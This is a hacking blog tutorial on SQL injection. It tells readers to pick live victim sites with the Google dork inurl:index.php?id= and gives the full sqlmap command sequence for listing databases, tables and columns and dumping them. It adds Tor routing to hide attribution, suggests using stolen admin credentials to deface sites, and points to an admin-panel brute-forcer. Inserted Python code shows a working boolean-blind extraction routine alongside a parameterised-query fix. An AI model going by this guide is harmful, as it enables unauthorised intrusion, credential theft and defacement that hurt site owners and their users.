How to hack a database with SQL injection – sqlmap

Most websites keep their data in a relational database management system (RDBMS) such as MySQL. These databases store data in tables and columns so that it can be queried easily. Server-side languages like PHP connect to the database with a set of credentials and read from or write to it with whatever permissions that account has. Much of a site's sensitive information, login credentials included, lives in these tables, so an attacker's first target is often the database itself: the credentials pulled out of it usually open the admin panel.

SQL injection exploits a flaw in a server-side script. A script that pastes user input straight into a query string, without escaping it or binding it as a parameter, lets whatever the user sends become part of the SQL the database executes. Crafting input so that it changes the meaning of that query is what we call SQL injection.

Video Demo

Consider a scenario: a PHP script accepts a GET parameter "name" and searches a table in a database (e.g. URL: www.example.com/search.php?name=bill).

The query looks like this:

SELECT * FROM profiles WHERE name = 'bill';

If you add a single quote at the end of the URL

www.example.com/search.php?name=bill'

the script builds and executes this query:

SELECT * FROM profiles WHERE name = 'bill'';

The extra quote leaves an unterminated string literal, so the database returns a syntax error. An error (or a page that suddenly renders differently) tells you the input reaches the query unescaped, which means the target is vulnerable. From there, instead of a bare quote, we inject our own SQL to fetch the sensitive data. A site that swallows database errors can still be vulnerable; it just takes a boolean or time-based test to confirm it, which is what sqlmap automates below.
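To make the mechanics concrete, here is an added example (not the article's code) that models search.php with Python's built-in sqlite3 module: search_vulnerable() concatenates the parameter exactly as the script above does, search_safe() binds it as a parameter instead, and probe() shows what a tester sees for the plain name, the name with a trailing quote, and the classic ' OR '1'='1 payload. The table rows are constructed, and SQLite stands in for the MySQL the article has in mind; the effect of the stray quote is the same.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the article's `profiles` table (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE profiles (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO profiles (name, email) VALUES (?, ?)",
        [("bill", "bill@example.com"), ("alice", "alice@example.com")],
    )
    return conn


def search_vulnerable(conn, name):
    """Mirrors search.php: the GET parameter is concatenated straight into the SQL."""
    query = f"SELECT * FROM profiles WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def search_safe(conn, name):
    """Hardened form: the driver sends `name` as data, so quotes in it are just text."""
    return conn.execute("SELECT * FROM profiles WHERE name = ?", (name,)).fetchall()


def probe(conn, name):
    """What a tester observes: ('ok', rows) for a normal page, ('error', msg) for a SQL error."""
    try:
        return ("ok", search_vulnerable(conn, name))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = build_db()
    print(probe(conn, "bill"))            # normal: one row for bill
    print(probe(conn, "bill'"))           # trailing quote: unterminated literal -> SQL error
    print(probe(conn, "' OR '1'='1"))     # injected condition: every row comes back
    print(search_safe(conn, "' OR '1'='1"))  # parameterised: no such name, empty result
```

The error from the trailing quote is the signal the article describes; the ' OR '1'='1 payload shows why that signal matters, and the parameterised query shows the only reliable fix: keep data out of the SQL text entirely rather than trying to filter "special characters".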


Finding a target

You can pick a target with Google dorks. In the Google search bar try the keyword:
inurl:index.php?id=
You will get plenty of results. Choose a target and open the URL with a quote appended to the parameter value. If the page shows a SQL syntax error or comes back blank, the site is probably vulnerable. Copy the target URL to the clipboard. There are plenty of other dorks; try those too.

SQLMAP

Sqlmap is a Python tool built specifically for finding and exploiting SQL injection. It is stable and has a large set of options. So let's start by enumerating the databases:
# sqlmap -u "http://target.com/vuln.php?id=1" --dbs


This is the first step. Sqlmap tests the given parameter with every injection technique it knows. Once it finds a working one it asks whether you want to keep testing for others; stop or continue as you prefer (pass --batch to accept the defaults without prompts). Because we passed --dbs, sqlmap then retrieves the database names. With a database name in hand you can fetch its tables:
# sqlmap -u "http://target.com/vuln.php?id=1" -D database_name --tables

After fetching the database and its tables, fetch the columns:


# sqlmap -u "http://target.com/vuln.php?id=1" -D database_name -T table_name --columns

Dump the data from the columns you are interested in:


# sqlmap -u "http://target.com/vuln.php?id=1" -D database_name -T table_name -C column_name --dump
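As an added example, not sqlmap's own code and not the article's, the following Python models the boolean-based blind technique that sqlmap relies on when the page shows no error text: page_returns_rows() plays vuln.php?id=1 against a constructed SQLite table, oracle() wraps a condition in the "1 AND (...)" payload, and extract_string() recovers a value one character at a time by binary-searching its code point with nothing but true/false answers. On MySQL sqlmap would read names from information_schema; SQLite's catalogue, sqlite_master, is used here instead. dump_first_user() chains the steps the way the --dbs, --tables and --dump commands above do. The table, the admin user and the 'constructed-hash' value are all invented.

```python
import sqlite3

# Constructed stand-in for the target behind vuln.php?id=1 (sample data, not a real site).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-hash')")

REQUESTS = {"sent": 0}  # how many "HTTP requests" an extraction costs


def page_returns_rows(id_param: str) -> bool:
    """The vulnerable page: the id parameter is an integer dropped straight into the
    query, so no quote is needed. True means the normal page rendered (a row came back),
    False means a blank page. That single bit is all the feedback the attacker gets."""
    REQUESTS["sent"] += 1
    query = f"SELECT username FROM users WHERE id = {id_param}"
    return len(conn.execute(query).fetchall()) > 0


def oracle(condition: str) -> bool:
    """Boolean-based blind payload: id=1 AND (<condition>)."""
    return page_returns_rows(f"1 AND ({condition})")


def extract_string(subquery: str, max_len: int = 64) -> str:
    """Recover the first value returned by `subquery`, one character per position.

    Each character's code point is found by binary search with the question
    'unicode(substr(<value>, pos, 1)) > mid', i.e. 7 requests per character for ASCII.
    Past the end of the string substr() is empty, unicode() yields NULL, every comparison
    is false, the search settles on 0 and the loop stops.
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # ASCII range; widen for non-ASCII data
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


def dump_first_user() -> dict:
    """The --dbs/--tables/--dump chain reduced to its essence on this toy target."""
    REQUESTS["sent"] = 0
    # MySQL would use information_schema here; SQLite keeps its catalogue in sqlite_master.
    table = extract_string("SELECT name FROM sqlite_master WHERE type='table' LIMIT 1")
    user = extract_string(f"SELECT username FROM {table} LIMIT 1")
    pw = extract_string(f"SELECT password FROM {table} LIMIT 1")
    return {"table": table, "username": user, "password": pw, "requests": REQUESTS["sent"]}


if __name__ == "__main__":
    print(dump_first_user())
```

Every character costs about seven requests, so even this three-value dump needs a couple of hundred hits; that is why blind extraction of a whole table is slow, why the --threads option below matters, and why the attempt is very visible in the target's web server logs.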


Advanced

Sqlmap can route its traffic through Tor so the target sees a Tor exit node rather than your IP. --tor sends requests through the local Tor proxy, --check-tor verifies that the Tor connection actually works before the scan starts, and --tor-type selects the proxy protocol (SOCKS5 is the default). Tor makes the traffic harder to attribute, not private: it is slow, and an exit node can read plain HTTP requests and responses.
# sqlmap --tor --check-tor --tor-type=SOCKS5 -u "http://target.com/vuln.php?id=1" --dbs


Increase the speed with multiple threads (10 is the maximum sqlmap allows; more threads also means more load and more noise in the target's logs):


# sqlmap --threads 10 -u "http://target.com/vuln.php?id=1" --dbs
This will help you get the admin login details. With those you can access the control panel and deface the whole website. I have designed a simple script to find the admin panel of a website. Download cpscan.py from GitHub,


or directly clone by the command


# git clone https://github.com/susmithHCK/cpscan.git


This Python script brute-forces all the likely directories on a server and detects the control panel by the HTTP response codes. It can detect the panel on almost 85% of websites. Hope this helped you guys. For any doubts or questions, please use the comment box below.

susmith HCK

I'm a computer enthusiast basically and I love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and I would like to explore security vulnerabilities and the latest tech news and share them with you. If you like all this stuff, add me on Facebook and Google Plus.

5 Responses

  1. Whoa! Thanks, amazing tutorial man! Keep sharing.

  2. Thank you for the good writeup. It in fact was an amusement account it. Look advanced to far added agreeable from you! However, how can we communicate?
